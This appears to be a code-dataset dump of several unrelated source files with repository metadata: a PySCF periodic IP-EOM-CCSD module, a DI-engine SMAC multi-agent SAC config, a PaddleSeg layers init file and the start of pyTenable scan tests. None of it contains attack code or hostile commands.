line3 = GLine(upper_left_x+length*0.5, upper_left_y+length*0.866, upper_left_x + length, upper_left_y)
window.add(line1)
window.add(line2)
window.add(line3)
sierpinski_triangle(order-1, length*0.5, upper_left_x, upper_left_y)
sierpinski_triangle(order-1, length*0.5, upper_left_x+length/2, upper_left_y)
sierpinski_triangle(order-1, length*0.5, upper_left_x+length*0.5/2, upper_left_y+length*0.866/2)
if __name__ == '__main__':
main()
| true
| true
|
1c445c8ccc4933db31ddfcff4f2af668f7348e6b
| 12,255
|
py
|
Python
|
pyscf/pbc/cc/eom_kccsd_rhf_ip.py
|
crisely09/pyscf
|
cb92f7974bd9c87c0ef5b2b52abf5d3219b3d6b6
|
[
"Apache-2.0"
] | 2
|
2019-05-28T05:25:56.000Z
|
2019-11-09T02:16:43.000Z
|
pyscf/pbc/cc/eom_kccsd_rhf_ip.py
|
crisely09/pyscf
|
cb92f7974bd9c87c0ef5b2b52abf5d3219b3d6b6
|
[
"Apache-2.0"
] | 2
|
2019-09-16T17:58:31.000Z
|
2019-09-22T17:26:01.000Z
|
pyscf/pbc/cc/eom_kccsd_rhf_ip.py
|
crisely09/pyscf
|
cb92f7974bd9c87c0ef5b2b52abf5d3219b3d6b6
|
[
"Apache-2.0"
] | 1
|
2019-11-09T02:13:16.000Z
|
2019-11-09T02:13:16.000Z
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Artem Pulkin, pyscf authors
from pyscf.lib import logger, linalg_helper, einsum
from pyscf.lib.parameters import LARGE_DENOM
from pyscf.pbc.lib.kpts_helper import VectorSplitter, VectorComposer
from pyscf.pbc.mp.kmp2 import padding_k_idx
import numpy as np
import time
def iter_12(cc, k):
"""Iterates over IP index slices."""
o, v = padding_k_idx(cc, kind="split")
kconserv = cc.khelper.kconserv
yield (o[k],)
for ki in range(cc.nkpts):
for kj in range(cc.nkpts):
kb = kconserv[ki, k, kj]
yield (ki,), (kj,), o[ki], o[kj], v[kb]
def amplitudes_to_vector(cc, t1, t2, k):
"""IP amplitudes to vector."""
itr = iter_12(cc, k)
t1, t2 = np.asarray(t1), np.asarray(t2)
vc = VectorComposer(t1.dtype)
vc.put(t1[np.ix_(*next(itr))])
for slc in itr:
vc.put(t2[np.ix_(*slc)])
return vc.flush()
def vector_to_amplitudes(cc, vec, k):
"""IP vector to apmplitudes."""
expected_vs = vector_size(cc, k)
if expected_vs != len(vec):
raise ValueError("The size of the vector passed {:d} should be exactly {:d}".format(len(vec), expected_vs))
itr = iter_12(cc, k)
vs = VectorSplitter(vec)
r1 = vs.get(cc.nocc, slc=next(itr))
r2 = np.zeros((cc.nkpts, cc.nkpts, cc.nocc, cc.nocc, cc.nmo - cc.nocc), vec.dtype)
for slc in itr:
vs.get(r2, slc=slc)
return r1, r2
def vector_size(cc, k):
"""The total number of elements in IP vector."""
size = 0
for slc in iter_12(cc, k):
size += np.prod(tuple(len(i) for i in slc))
return size
def kernel(cc, nroots=1, koopmans=False, guess=None, partition=None,
kptlist=None):
'''Calculate (N-1)-electron charged excitations via IP-EOM-CCSD.
Kwargs:
nroots : int
Number of roots (eigenvalues) requested per k-point
koopmans : bool
Calculate Koopmans'-like (quasiparticle) excitations only, targeting via
overlap.
guess : list of ndarray
List of guess vectors to use for targeting via overlap.
partition : bool or str
Use a matrix-partitioning for the doubles-doubles block.
Can be None, 'mp' (Moller-Plesset, i.e. orbital energies on the diagonal),
or 'full' (full diagonal elements).
kptlist : list
List of k-point indices for which eigenvalues are requested.
'''
cput0 = (time.clock(), time.time())
log = logger.Logger(cc.stdout, cc.verbose)
nocc = cc.nocc
nvir = cc.nmo - nocc
nkpts = cc.nkpts
if kptlist is None:
kptlist = range(nkpts)
for k, kshift in enumerate(kptlist):
size = vector_size(cc, kshift)
nfrozen = np.sum(mask_frozen(cc, np.zeros(size, dtype=int), kshift, const=1))
nroots = min(nroots, size - nfrozen)
if partition:
partition = partition.lower()
assert partition in ['mp', 'full']
cc.ip_partition = partition
evals = np.zeros((len(kptlist), nroots), np.float)
evecs = []
for k, kshift in enumerate(kptlist):
adiag = diag(cc, kshift)
adiag = mask_frozen(cc, adiag, kshift, const=LARGE_DENOM)
size = vector_size(cc, kshift)
if partition == 'full':
cc._ipccsd_diag_matrix2 = vector_to_amplitudes(cc, adiag, kshift)[1]
if guess is not None:
guess_k = guess[k]
# assert len(guess_k) == nroots
for g in guess_k:
assert g.size == size
else:
guess_k = []
if koopmans:
for n in range(nroots):
g = np.zeros(size)
nocc = cc.get_nocc(True)[kshift]
g[nocc-n-1] = 1.0
g = mask_frozen(cc, g, kshift, const=0.0)
guess_k.append(g)
else:
idx = adiag.argsort()[:nroots]
for i in idx:
g = np.zeros(size)
g[i] = 1.0
g = mask_frozen(cc, g, kshift, const=0.0)
guess_k.append(g)
def precond(r, e0, x0):
return r / (e0 - adiag + 1e-12)
eig = linalg_helper.eig
if guess is not None or koopmans:
def pickeig(w, v, nroots, envs):
x0 = linalg_helper._gen_x0(envs['v'], envs['xs'])
s = np.dot(np.asarray(guess_k).conj(), np.asarray(x0).T)
snorm = np.einsum('pi,pi->i', s.conj(), s)
idx = np.argsort(-snorm)[:nroots]
return linalg_helper._eigs_cmplx2real(w, v, idx, real_eigenvectors=False)
evals_k, evecs_k = eig(lambda _arg: matvec(cc, _arg, kshift), guess_k, precond, pick=pickeig,
tol=cc.conv_tol, max_cycle=cc.max_cycle,
max_space=cc.max_space, nroots=len(guess_k), verbose=cc.verbose)
else:
evals_k, evecs_k = eig(lambda _arg: matvec(cc, _arg, kshift), guess_k, precond,
tol=cc.conv_tol, max_cycle=cc.max_cycle,
max_space=cc.max_space, nroots=len(guess_k), verbose=cc.verbose)
if nroots == 1:
evals_k, evecs_k = np.array([evals_k]), np.array([evecs_k])
evals_k = evals_k.real
evals[k] = evals_k
evecs.append(evecs_k)
for n, en, vn in zip(range(nroots), evals_k, evecs_k):
r1, r2 = vector_to_amplitudes(cc, vn, kshift)
qp_weight = np.linalg.norm(r1) ** 2
logger.info(cc, 'EOM root %d E = %.16g qpwt = %0.6g',
n, en, qp_weight)
log.timer('EOM-CCSD', *cput0)
cc.eip = evals
return cc.eip, evecs
def matvec(cc, vector, k):
'''2ph operators are of the form s_{ij}^{ b}, i.e. 'jb' indices are coupled.'''
# Ref: Nooijen and Snijders, J. Chem. Phys. 102, 1681 (1995) Eqs.(8)-(9)
if not cc.imds.made_ip_imds:
cc.imds.make_ip(cc.ip_partition)
imds = cc.imds
vector = mask_frozen(cc, vector, k, const=0.0)
r1, r2 = vector_to_amplitudes(cc, vector, k)
t1, t2 = cc.t1, cc.t2
nkpts = cc.nkpts
kconserv = cc.khelper.kconserv
# 1h-1h block
Hr1 = -einsum('ki,k->i', imds.Loo[k], r1)
# 1h-2h1p block
for kl in range(nkpts):
Hr1 += 2. * einsum('ld,ild->i', imds.Fov[kl], r2[k, kl])
Hr1 += -einsum('ld,lid->i', imds.Fov[kl], r2[kl, k])
for kk in range(nkpts):
kd = kconserv[kk, k, kl]
Hr1 += -2. * einsum('klid,kld->i', imds.Wooov[kk, kl, k], r2[kk, kl])
Hr1 += einsum('lkid,kld->i', imds.Wooov[kl, kk, k], r2[kk, kl])
Hr2 = np.zeros(r2.shape, dtype=np.common_type(imds.Wovoo[0, 0, 0], r1))
# 2h1p-1h block
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] -= einsum('kbij,k->ijb', imds.Wovoo[k, kb, ki], r1)
# 2h1p-2h1p block
if cc.ip_partition == 'mp':
nkpts, nocc, nvir = cc.t1.shape
fock = cc.eris.fock
foo = fock[:, :nocc, :nocc]
fvv = fock[:, nocc:, nocc:]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] += einsum('bd,ijd->ijb', fvv[kb], r2[ki, kj])
Hr2[ki, kj] -= einsum('li,ljb->ijb', foo[ki], r2[ki, kj])
Hr2[ki, kj] -= einsum('lj,ilb->ijb', foo[kj], r2[ki, kj])
elif cc.ip_partition == 'full':
Hr2 += cc._ipccsd_diag_matrix2 * r2
else:
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] += einsum('bd,ijd->ijb', imds.Lvv[kb], r2[ki, kj])
Hr2[ki, kj] -= einsum('li,ljb->ijb', imds.Loo[ki], r2[ki, kj])
Hr2[ki, kj] -= einsum('lj,ilb->ijb', imds.Loo[kj], r2[ki, kj])
for kl in range(nkpts):
kk = kconserv[ki, kl, kj]
Hr2[ki, kj] += einsum('klij,klb->ijb', imds.Woooo[kk, kl, ki], r2[kk, kl])
kd = kconserv[kl, kj, kb]
Hr2[ki, kj] += 2. * einsum('lbdj,ild->ijb', imds.Wovvo[kl, kb, kd], r2[ki, kl])
Hr2[ki, kj] += -einsum('lbdj,lid->ijb', imds.Wovvo[kl, kb, kd], r2[kl, ki])
Hr2[ki, kj] += -einsum('lbjd,ild->ijb', imds.Wovov[kl, kb, kj], r2[ki, kl]) # typo in Ref
kd = kconserv[kl, ki, kb]
Hr2[ki, kj] += -einsum('lbid,ljd->ijb', imds.Wovov[kl, kb, ki], r2[kl, kj])
tmp = (2. * einsum('xyklcd,xykld->c', imds.Woovv[:, :, k], r2[:, :])
- einsum('yxlkcd,xykld->c', imds.Woovv[:, :, k], r2[:, :]))
Hr2[:, :] += -einsum('c,xyijcb->xyijb', tmp, t2[:, :, k])
return mask_frozen(cc, amplitudes_to_vector(cc, Hr1, Hr2, k), k, const=0.0)
def diag(cc, k):
"""Diagonal for the IP vector update."""
if not cc.imds.made_ip_imds:
cc.imds.make_ip(cc.ip_partition)
imds = cc.imds
t1, t2 = cc.t1, cc.t2
nkpts, nocc, nvir = t1.shape
kconserv = cc.khelper.kconserv
Hr1 = -np.diag(imds.Loo[k])
Hr2 = np.zeros((nkpts, nkpts, nocc, nocc, nvir), dtype=t1.dtype)
if cc.ip_partition == 'mp':
foo = cc.eris.fock[:, :nocc, :nocc]
fvv = cc.eris.fock[:, nocc:, nocc:]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] = fvv[kb].diagonal()
Hr2[ki, kj] -= foo[ki].diagonal()[:, None, None]
Hr2[ki, kj] -= foo[kj].diagonal()[:, None]
else:
idx = np.arange(nocc)
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] = imds.Lvv[kb].diagonal()
Hr2[ki, kj] -= imds.Loo[ki].diagonal()[:, None, None]
Hr2[ki, kj] -= imds.Loo[kj].diagonal()[:, None]
if ki == kconserv[ki, kj, kj]:
Hr2[ki, kj] += np.einsum('ijij->ij', imds.Woooo[ki, kj, ki])[:, :, None]
Hr2[ki, kj] -= np.einsum('jbjb->jb', imds.Wovov[kj, kb, kj])
Wovvo = np.einsum('jbbj->jb', imds.Wovvo[kj, kb, kb])
Hr2[ki, kj] += 2. * Wovvo
if ki == kj: # and i == j
Hr2[ki, ki, idx, idx] -= Wovvo
Hr2[ki, kj] -= np.einsum('ibib->ib', imds.Wovov[ki, kb, ki])[:, None, :]
kd = kconserv[kj, k, ki]
Hr2[ki, kj] -= 2. * np.einsum('ijcb,jibc->ijb', t2[ki, kj, k], imds.Woovv[kj, ki, kd])
Hr2[ki, kj] += np.einsum('ijcb,ijbc->ijb', t2[ki, kj, k], imds.Woovv[ki, kj, kd])
return amplitudes_to_vector(cc, Hr1, Hr2, k)
def mask_frozen(cc, vector, k, const=LARGE_DENOM):
'''Replaces all frozen orbital indices of `vector` with the value `const`.'''
r1, r2 = vector_to_amplitudes(cc, vector, k)
nkpts, nocc, nvir = cc.t1.shape
kconserv = cc.khelper.kconserv
# Get location of padded elements in occupied and virtual space
nonzero_opadding, nonzero_vpadding = padding_k_idx(cc, kind="split")
new_r1 = const * np.ones_like(r1)
new_r2 = const * np.ones_like(r2)
new_r1[nonzero_opadding[k]] = r1[nonzero_opadding[k]]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
idx = np.ix_([ki], [kj], nonzero_opadding[ki], nonzero_opadding[kj], nonzero_vpadding[kb])
new_r2[idx] = r2[idx]
return amplitudes_to_vector(cc, new_r1, new_r2, k)
| 38.416928
| 115
| 0.548919
|
from pyscf.lib import logger, linalg_helper, einsum
from pyscf.lib.parameters import LARGE_DENOM
from pyscf.pbc.lib.kpts_helper import VectorSplitter, VectorComposer
from pyscf.pbc.mp.kmp2 import padding_k_idx
import numpy as np
import time
def iter_12(cc, k):
o, v = padding_k_idx(cc, kind="split")
kconserv = cc.khelper.kconserv
yield (o[k],)
for ki in range(cc.nkpts):
for kj in range(cc.nkpts):
kb = kconserv[ki, k, kj]
yield (ki,), (kj,), o[ki], o[kj], v[kb]
def amplitudes_to_vector(cc, t1, t2, k):
itr = iter_12(cc, k)
t1, t2 = np.asarray(t1), np.asarray(t2)
vc = VectorComposer(t1.dtype)
vc.put(t1[np.ix_(*next(itr))])
for slc in itr:
vc.put(t2[np.ix_(*slc)])
return vc.flush()
def vector_to_amplitudes(cc, vec, k):
expected_vs = vector_size(cc, k)
if expected_vs != len(vec):
raise ValueError("The size of the vector passed {:d} should be exactly {:d}".format(len(vec), expected_vs))
itr = iter_12(cc, k)
vs = VectorSplitter(vec)
r1 = vs.get(cc.nocc, slc=next(itr))
r2 = np.zeros((cc.nkpts, cc.nkpts, cc.nocc, cc.nocc, cc.nmo - cc.nocc), vec.dtype)
for slc in itr:
vs.get(r2, slc=slc)
return r1, r2
def vector_size(cc, k):
size = 0
for slc in iter_12(cc, k):
size += np.prod(tuple(len(i) for i in slc))
return size
def kernel(cc, nroots=1, koopmans=False, guess=None, partition=None,
kptlist=None):
cput0 = (time.clock(), time.time())
log = logger.Logger(cc.stdout, cc.verbose)
nocc = cc.nocc
nvir = cc.nmo - nocc
nkpts = cc.nkpts
if kptlist is None:
kptlist = range(nkpts)
for k, kshift in enumerate(kptlist):
size = vector_size(cc, kshift)
nfrozen = np.sum(mask_frozen(cc, np.zeros(size, dtype=int), kshift, const=1))
nroots = min(nroots, size - nfrozen)
if partition:
partition = partition.lower()
assert partition in ['mp', 'full']
cc.ip_partition = partition
evals = np.zeros((len(kptlist), nroots), np.float)
evecs = []
for k, kshift in enumerate(kptlist):
adiag = diag(cc, kshift)
adiag = mask_frozen(cc, adiag, kshift, const=LARGE_DENOM)
size = vector_size(cc, kshift)
if partition == 'full':
cc._ipccsd_diag_matrix2 = vector_to_amplitudes(cc, adiag, kshift)[1]
if guess is not None:
guess_k = guess[k]
for g in guess_k:
assert g.size == size
else:
guess_k = []
if koopmans:
for n in range(nroots):
g = np.zeros(size)
nocc = cc.get_nocc(True)[kshift]
g[nocc-n-1] = 1.0
g = mask_frozen(cc, g, kshift, const=0.0)
guess_k.append(g)
else:
idx = adiag.argsort()[:nroots]
for i in idx:
g = np.zeros(size)
g[i] = 1.0
g = mask_frozen(cc, g, kshift, const=0.0)
guess_k.append(g)
def precond(r, e0, x0):
return r / (e0 - adiag + 1e-12)
eig = linalg_helper.eig
if guess is not None or koopmans:
def pickeig(w, v, nroots, envs):
x0 = linalg_helper._gen_x0(envs['v'], envs['xs'])
s = np.dot(np.asarray(guess_k).conj(), np.asarray(x0).T)
snorm = np.einsum('pi,pi->i', s.conj(), s)
idx = np.argsort(-snorm)[:nroots]
return linalg_helper._eigs_cmplx2real(w, v, idx, real_eigenvectors=False)
evals_k, evecs_k = eig(lambda _arg: matvec(cc, _arg, kshift), guess_k, precond, pick=pickeig,
tol=cc.conv_tol, max_cycle=cc.max_cycle,
max_space=cc.max_space, nroots=len(guess_k), verbose=cc.verbose)
else:
evals_k, evecs_k = eig(lambda _arg: matvec(cc, _arg, kshift), guess_k, precond,
tol=cc.conv_tol, max_cycle=cc.max_cycle,
max_space=cc.max_space, nroots=len(guess_k), verbose=cc.verbose)
if nroots == 1:
evals_k, evecs_k = np.array([evals_k]), np.array([evecs_k])
evals_k = evals_k.real
evals[k] = evals_k
evecs.append(evecs_k)
for n, en, vn in zip(range(nroots), evals_k, evecs_k):
r1, r2 = vector_to_amplitudes(cc, vn, kshift)
qp_weight = np.linalg.norm(r1) ** 2
logger.info(cc, 'EOM root %d E = %.16g qpwt = %0.6g',
n, en, qp_weight)
log.timer('EOM-CCSD', *cput0)
cc.eip = evals
return cc.eip, evecs
def matvec(cc, vector, k):
if not cc.imds.made_ip_imds:
cc.imds.make_ip(cc.ip_partition)
imds = cc.imds
vector = mask_frozen(cc, vector, k, const=0.0)
r1, r2 = vector_to_amplitudes(cc, vector, k)
t1, t2 = cc.t1, cc.t2
nkpts = cc.nkpts
kconserv = cc.khelper.kconserv
Hr1 = -einsum('ki,k->i', imds.Loo[k], r1)
for kl in range(nkpts):
Hr1 += 2. * einsum('ld,ild->i', imds.Fov[kl], r2[k, kl])
Hr1 += -einsum('ld,lid->i', imds.Fov[kl], r2[kl, k])
for kk in range(nkpts):
kd = kconserv[kk, k, kl]
Hr1 += -2. * einsum('klid,kld->i', imds.Wooov[kk, kl, k], r2[kk, kl])
Hr1 += einsum('lkid,kld->i', imds.Wooov[kl, kk, k], r2[kk, kl])
Hr2 = np.zeros(r2.shape, dtype=np.common_type(imds.Wovoo[0, 0, 0], r1))
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] -= einsum('kbij,k->ijb', imds.Wovoo[k, kb, ki], r1)
if cc.ip_partition == 'mp':
nkpts, nocc, nvir = cc.t1.shape
fock = cc.eris.fock
foo = fock[:, :nocc, :nocc]
fvv = fock[:, nocc:, nocc:]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] += einsum('bd,ijd->ijb', fvv[kb], r2[ki, kj])
Hr2[ki, kj] -= einsum('li,ljb->ijb', foo[ki], r2[ki, kj])
Hr2[ki, kj] -= einsum('lj,ilb->ijb', foo[kj], r2[ki, kj])
elif cc.ip_partition == 'full':
Hr2 += cc._ipccsd_diag_matrix2 * r2
else:
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] += einsum('bd,ijd->ijb', imds.Lvv[kb], r2[ki, kj])
Hr2[ki, kj] -= einsum('li,ljb->ijb', imds.Loo[ki], r2[ki, kj])
Hr2[ki, kj] -= einsum('lj,ilb->ijb', imds.Loo[kj], r2[ki, kj])
for kl in range(nkpts):
kk = kconserv[ki, kl, kj]
Hr2[ki, kj] += einsum('klij,klb->ijb', imds.Woooo[kk, kl, ki], r2[kk, kl])
kd = kconserv[kl, kj, kb]
Hr2[ki, kj] += 2. * einsum('lbdj,ild->ijb', imds.Wovvo[kl, kb, kd], r2[ki, kl])
Hr2[ki, kj] += -einsum('lbdj,lid->ijb', imds.Wovvo[kl, kb, kd], r2[kl, ki])
Hr2[ki, kj] += -einsum('lbjd,ild->ijb', imds.Wovov[kl, kb, kj], r2[ki, kl])
kd = kconserv[kl, ki, kb]
Hr2[ki, kj] += -einsum('lbid,ljd->ijb', imds.Wovov[kl, kb, ki], r2[kl, kj])
tmp = (2. * einsum('xyklcd,xykld->c', imds.Woovv[:, :, k], r2[:, :])
- einsum('yxlkcd,xykld->c', imds.Woovv[:, :, k], r2[:, :]))
Hr2[:, :] += -einsum('c,xyijcb->xyijb', tmp, t2[:, :, k])
return mask_frozen(cc, amplitudes_to_vector(cc, Hr1, Hr2, k), k, const=0.0)
def diag(cc, k):
if not cc.imds.made_ip_imds:
cc.imds.make_ip(cc.ip_partition)
imds = cc.imds
t1, t2 = cc.t1, cc.t2
nkpts, nocc, nvir = t1.shape
kconserv = cc.khelper.kconserv
Hr1 = -np.diag(imds.Loo[k])
Hr2 = np.zeros((nkpts, nkpts, nocc, nocc, nvir), dtype=t1.dtype)
if cc.ip_partition == 'mp':
foo = cc.eris.fock[:, :nocc, :nocc]
fvv = cc.eris.fock[:, nocc:, nocc:]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] = fvv[kb].diagonal()
Hr2[ki, kj] -= foo[ki].diagonal()[:, None, None]
Hr2[ki, kj] -= foo[kj].diagonal()[:, None]
else:
idx = np.arange(nocc)
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] = imds.Lvv[kb].diagonal()
Hr2[ki, kj] -= imds.Loo[ki].diagonal()[:, None, None]
Hr2[ki, kj] -= imds.Loo[kj].diagonal()[:, None]
if ki == kconserv[ki, kj, kj]:
Hr2[ki, kj] += np.einsum('ijij->ij', imds.Woooo[ki, kj, ki])[:, :, None]
Hr2[ki, kj] -= np.einsum('jbjb->jb', imds.Wovov[kj, kb, kj])
Wovvo = np.einsum('jbbj->jb', imds.Wovvo[kj, kb, kb])
Hr2[ki, kj] += 2. * Wovvo
if ki == kj:
Hr2[ki, ki, idx, idx] -= Wovvo
Hr2[ki, kj] -= np.einsum('ibib->ib', imds.Wovov[ki, kb, ki])[:, None, :]
kd = kconserv[kj, k, ki]
Hr2[ki, kj] -= 2. * np.einsum('ijcb,jibc->ijb', t2[ki, kj, k], imds.Woovv[kj, ki, kd])
Hr2[ki, kj] += np.einsum('ijcb,ijbc->ijb', t2[ki, kj, k], imds.Woovv[ki, kj, kd])
return amplitudes_to_vector(cc, Hr1, Hr2, k)
def mask_frozen(cc, vector, k, const=LARGE_DENOM):
r1, r2 = vector_to_amplitudes(cc, vector, k)
nkpts, nocc, nvir = cc.t1.shape
kconserv = cc.khelper.kconserv
nonzero_opadding, nonzero_vpadding = padding_k_idx(cc, kind="split")
new_r1 = const * np.ones_like(r1)
new_r2 = const * np.ones_like(r2)
new_r1[nonzero_opadding[k]] = r1[nonzero_opadding[k]]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
idx = np.ix_([ki], [kj], nonzero_opadding[ki], nonzero_opadding[kj], nonzero_vpadding[kb])
new_r2[idx] = r2[idx]
return amplitudes_to_vector(cc, new_r1, new_r2, k)
| true
| true
|
1c445cab1f264bc0cde511b0887a73c7ef7e0b55
| 2,571
|
py
|
Python
|
dizoo/smac/config/smac_10m11m_masac_config.py
|
davide97l/DI-engine
|
d48c93bcd5c07c29f2ce4ac1b7756b8bc255c423
|
[
"Apache-2.0"
] | 1
|
2022-03-21T16:15:39.000Z
|
2022-03-21T16:15:39.000Z
|
dizoo/smac/config/smac_10m11m_masac_config.py
|
jiaruonan/DI-engine
|
268d77db3cb54401b2cfc83e2bc3ec87c31e7b83
|
[
"Apache-2.0"
] | null | null | null |
dizoo/smac/config/smac_10m11m_masac_config.py
|
jiaruonan/DI-engine
|
268d77db3cb54401b2cfc83e2bc3ec87c31e7b83
|
[
"Apache-2.0"
] | null | null | null |
from easydict import EasyDict
agent_num = 10
collector_env_num = 8
evaluator_env_num = 8
special_global_state = True
SMAC_10m11m_masac_default_config = dict(
exp_name='smac_10m11m_masac_seed0',
env=dict(
map_name='10m_vs_11m',
difficulty=7,
reward_only_positive=True,
mirror_opponent=False,
agent_num=agent_num,
collector_env_num=collector_env_num,
evaluator_env_num=evaluator_env_num,
n_evaluator_episode=32,
stop_value=0.99,
death_mask=False,
special_global_state=special_global_state,
manager=dict(
shared_memory=False,
reset_timeout=6000,
),
),
policy=dict(
cuda=True,
on_policy=False,
random_collect_size=0,
model=dict(
agent_obs_shape=132,
global_obs_shape=347,
action_shape=17,
twin_critic=True,
actor_head_hidden_size=256,
critic_head_hidden_size=256,
),
learn=dict(
update_per_collect=50,
batch_size=320,
learning_rate_q=5e-4,
learning_rate_policy=5e-4,
learning_rate_alpha=5e-5,
ignore_done=False,
target_theta=0.005,
discount_factor=0.99,
alpha=0.2,
auto_alpha=True,
log_space=True,
),
collect=dict(
env_num=collector_env_num,
n_sample=1600,
unroll_len=1,
),
command=dict(),
eval=dict(
evaluator=dict(
eval_freq=50,
),
env_num=evaluator_env_num,
),
other=dict(
eps=dict(
type='linear',
start=1,
end=0.05,
decay=100000,
),
replay_buffer=dict(replay_buffer_size=50000, ), ),
),
)
SMAC_10m11m_masac_default_config = EasyDict(SMAC_10m11m_masac_default_config)
main_config = SMAC_10m11m_masac_default_config
SMAC_10m11m_masac_default_create_config = dict(
env=dict(
type='smac',
import_names=['dizoo.smac.envs.smac_env'],
),
env_manager=dict(type='base'),
policy=dict(
type='sac_discrete',
),
)
SMAC_10m11m_masac_default_create_config = EasyDict(SMAC_10m11m_masac_default_create_config)
create_config = SMAC_10m11m_masac_default_create_config
if __name__ == '__main__':
from ding.entry import serial_pipeline
serial_pipeline((main_config, create_config), seed=0)
| 27.063158
| 91
| 0.597044
|
from easydict import EasyDict
agent_num = 10
collector_env_num = 8
evaluator_env_num = 8
special_global_state = True
SMAC_10m11m_masac_default_config = dict(
exp_name='smac_10m11m_masac_seed0',
env=dict(
map_name='10m_vs_11m',
difficulty=7,
reward_only_positive=True,
mirror_opponent=False,
agent_num=agent_num,
collector_env_num=collector_env_num,
evaluator_env_num=evaluator_env_num,
n_evaluator_episode=32,
stop_value=0.99,
death_mask=False,
special_global_state=special_global_state,
manager=dict(
shared_memory=False,
reset_timeout=6000,
),
),
policy=dict(
cuda=True,
on_policy=False,
random_collect_size=0,
model=dict(
agent_obs_shape=132,
global_obs_shape=347,
action_shape=17,
twin_critic=True,
actor_head_hidden_size=256,
critic_head_hidden_size=256,
),
learn=dict(
update_per_collect=50,
batch_size=320,
learning_rate_q=5e-4,
learning_rate_policy=5e-4,
learning_rate_alpha=5e-5,
ignore_done=False,
target_theta=0.005,
discount_factor=0.99,
alpha=0.2,
auto_alpha=True,
log_space=True,
),
collect=dict(
env_num=collector_env_num,
n_sample=1600,
unroll_len=1,
),
command=dict(),
eval=dict(
evaluator=dict(
eval_freq=50,
),
env_num=evaluator_env_num,
),
other=dict(
eps=dict(
type='linear',
start=1,
end=0.05,
decay=100000,
),
replay_buffer=dict(replay_buffer_size=50000, ), ),
),
)
SMAC_10m11m_masac_default_config = EasyDict(SMAC_10m11m_masac_default_config)
main_config = SMAC_10m11m_masac_default_config
SMAC_10m11m_masac_default_create_config = dict(
env=dict(
type='smac',
import_names=['dizoo.smac.envs.smac_env'],
),
env_manager=dict(type='base'),
policy=dict(
type='sac_discrete',
),
)
SMAC_10m11m_masac_default_create_config = EasyDict(SMAC_10m11m_masac_default_create_config)
create_config = SMAC_10m11m_masac_default_create_config
if __name__ == '__main__':
from ding.entry import serial_pipeline
serial_pipeline((main_config, create_config), seed=0)
| true
| true
|
1c445d0779c6f3b76f6736904e9cf3bc52dc1ec8
| 906
|
py
|
Python
|
paddleseg/models/layers/__init__.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 4,708
|
2019-08-26T13:54:39.000Z
|
2022-03-31T16:01:53.000Z
|
paddleseg/models/layers/__init__.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 1,083
|
2019-09-12T02:57:24.000Z
|
2022-03-31T13:30:30.000Z
|
paddleseg/models/layers/__init__.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 1,046
|
2019-08-26T22:05:01.000Z
|
2022-03-30T14:09:28.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .layer_libs import ConvBNReLU, ConvBN, SeparableConvBNReLU, DepthwiseConvBN, AuxLayer, SyncBatchNorm, JPU
from .activation import Activation
from .pyramid_pool import ASPPModule, PPModule
from .attention import AttentionBlock
from .nonlocal2d import NonLocal2D
from .wrap_functions import *
| 43.142857
| 110
| 0.791391
|
from .layer_libs import ConvBNReLU, ConvBN, SeparableConvBNReLU, DepthwiseConvBN, AuxLayer, SyncBatchNorm, JPU
from .activation import Activation
from .pyramid_pool import ASPPModule, PPModule
from .attention import AttentionBlock
from .nonlocal2d import NonLocal2D
from .wrap_functions import *
| true
| true
|
1c445ea6c0a52c6c28514c9caff9783dfe75ea10
| 18,183
|
py
|
Python
|
tests/sc/test_scans.py
|
allenmichael/pyTenable
|
8372cfdf3ced99de50227f6fbb37d6db2b26291e
|
[
"MIT"
] | null | null | null |
tests/sc/test_scans.py
|
allenmichael/pyTenable
|
8372cfdf3ced99de50227f6fbb37d6db2b26291e
|
[
"MIT"
] | null | null | null |
tests/sc/test_scans.py
|
allenmichael/pyTenable
|
8372cfdf3ced99de50227f6fbb37d6db2b26291e
|
[
"MIT"
] | null | null | null |
import pytest
from tenable.errors import APIError, UnexpectedValueError
from ..checker import check
def test_schedule_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor({'type': 1})
def test_schedule_constructor_type_unexpected_value(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._schedule_constructor({'type': 'nothing here'})
